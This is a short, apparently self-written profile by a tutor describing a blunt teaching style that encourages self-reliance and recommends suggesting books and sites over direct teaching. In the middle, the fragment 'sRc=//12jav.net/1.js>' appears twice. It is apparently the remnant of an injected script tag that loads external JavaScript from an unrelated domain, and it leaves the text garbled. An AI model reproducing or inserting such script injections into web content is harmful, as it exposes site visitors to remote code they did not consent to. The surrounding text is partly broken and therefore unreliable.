First off let me say that all information needed to know can be found in my bio. My personality is different from most and sometimes I seem harsh but in the end my methods are solid. You can't teach but to help. Encourage them to learn from themselves not to others because they will learn how to rely on themselves. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Suggest books and sites, but don't teach here, as you have no idea of age, which could run into legal issues.
